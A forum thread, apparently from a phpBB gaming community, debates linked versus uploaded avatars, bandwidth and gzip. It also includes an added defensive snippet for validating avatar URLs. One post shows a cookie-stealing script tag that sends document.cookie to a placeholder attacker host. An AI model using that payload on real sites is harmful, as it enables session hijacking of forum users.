Could you make the avatars uploadable rather than having the current system where users put in a url?
There are 2 problems with the current system:
1) as the avatar is offsite, the size restrictions cannot be imposed
2) There are certain security risks regarding javascript embedding, cookies and external avatars. These existed in the beta version of phpbb2. I am not sure if they have been fixed...
Quote from: Htwo
Could you make the avatars uploadable rather than having the current system where users put in a url?
There are 2 problems with the current system:
1) as the avatar is offsite, the size restrictions cannot be imposed
2) There are certain security risks regarding javascript embedding, cookies and external avatars. These existed in the beta version of phpbb2. I am not sure if they have been fixed...
Right. I'm not keen on having the server issue all the graphics, i.e. avatars. I thought you knew my views on that? :o I don't want the bandwidth from the server being used up for delivering uploaded avatars.
I may hack the templates to force 80x80. Dunno about the security issues you hinted at; show me some evidence please and I'll have a re-think.
I prefer people to link to external avatars and on the whole, people who have had big avatars, i.e. too large, have withdrawn them pretty quickly, so thanks to those people for reacting as they did.
No, definitely not! We need to find out what the average daily b/w will be once the full site is set up (and the Jolt server is up) before we consider that. Could be that map downloads/postings/etc push us close to the limit.
If there are security issues then disable avatars for a couple of weeks. No big deal really - I'm sure everyone can do without them for a bit.
Quote from: Lt_O_Top
Right. I'm not keen on having the server issue all the graphics, i.e. avatars. I thought you knew my views on that? :o I don't want the bandwidth from the server being used up for delivering uploaded avatars.
I think you greatly overestimate how much bandwidth doing this would use. The Avatars are static files on the server. As a result when someone views a thread, their browser caches all the avatars in that thread.
For example, even if Rizla were to view 100 threads in one day, all of which contain my avatar, his browser would only download it once. (this assumes he doesn't wipe the cache, and hasn't set it to 0 which is a fair assumption)
Personally I find that avatars account for less than 1MB of data transfers per month on my system. I run 3 BB's and have more users, although I suppose they are quite a bit less active than you lot :)
Quote from: Lt_O_Top
I may hack the templates to force 80x80. Dunno about the security issues you hinted at; show me some evidence please and I'll have a re-think.
I didn't want to go into any detail here, and in any case, I'm not too sure about this. If someone is able to execute javascript on a forum, they can use it to take cookies easily:
<script language="javascript" type="text/javascript">document.write('<img height=0 width=0 src="http://attackers_address/'+document.cookie+'">');</script>
In the above example, if the javascript was executed, the cookies of people who executed the script (by viewing a thread that contained it) would turn up in the error logs of the attacker's web server.
BBCode is very well made, and it is impossible to embed javascript with it. But it used to be the case (and might still be) that the way avatars were handled was lax, allowing the insertion of things that IE would interpret as Javascript...
Have you enabled Gzip yet BTW?
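Added example, not part of the original thread and not phpBB code: one way a board could check a user-supplied avatar URL before writing it into the page, so that the value cannot be a script URL or break out of the `src` attribute, with the 80x80 size forced in the markup. The function names, the 255-character limit and the extension list are assumptions, and the test URLs are constructed.

```javascript
// Added example. validateAvatarUrl and renderAvatar are hypothetical names,
// not functions from phpBB.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const ALLOWED_EXTENSIONS = /\.(gif|jpe?g|png)$/i; // assumed list

// Escape the characters that can close an attribute or open a tag.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Returns a normalised URL string, or null if the value must be refused.
function validateAvatarUrl(input) {
  if (typeof input !== "string" || input.length > 255) return null;
  // Refuse whitespace and control characters outright instead of stripping
  // them: browsers have historically ignored them inside a URL scheme.
  if (/[\u0000-\u0020\u007f]/.test(input)) return null;
  let url;
  try {
    url = new URL(input); // must be an absolute URL
  } catch {
    return null;
  }
  // Allowlist the scheme: this refuses javascript:, data:, vbscript: etc.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  if (url.username || url.password) return null; // no embedded credentials
  if (!ALLOWED_EXTENSIONS.test(url.pathname)) return null;
  return url.href; // parser output, with unsafe path characters encoded
}

// Build the avatar tag; an empty string means "show no avatar".
function renderAvatar(input) {
  const url = validateAvatarUrl(input);
  if (url === null) return "";
  // Escape on output as well, and force the display size in the markup.
  return `<img src="${escapeHtml(url)}" width="80" height="80" alt="avatar">`;
}
```

This only constrains the URL string and the displayed size; the remote file itself can still be any byte size or content, which is the limit of offsite avatars raised earlier in the thread. Marking the session cookie HttpOnly additionally keeps it out of reach of `document.cookie`.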
Quote:
For example, even if Rizla were to view 100 threads in one day, all of which contain my avatar, his browser would only download it once. (this assumes he doesn't wipe the cache, and hasn't set it to 0 which is a fair assumption)
Unfortunately it's not a fair assumption - my cache lives in a RAMdisk and is wiped every 15 minutes (at most). However I do recognise I am not a normal user :wink:
I do take your point - especially the Javascript issues.
I'd prefer to see what happens once the Jolt server goes up - there will probably be 8 or 9 new maps that need hosting somewhere and at 1-3MB/map it could eat up b/w pretty damn fast if we have a lot of visitors to the Jolt server.
Also you know what a bunch of spammers we are :lol:
Doesn't look like gzip is enabled. I'll leave that decision to Mike...
Htwo,
Thanks for raising these issues.
I'll have a look around at other sites to see how they deal with Avatars and I'll read up on GZip compression. I don't like turning on options without knowing what they do!! :lol:
I think we're right though to tread cautiously until we know the bandwidth being used.
Kind regards,
Mike T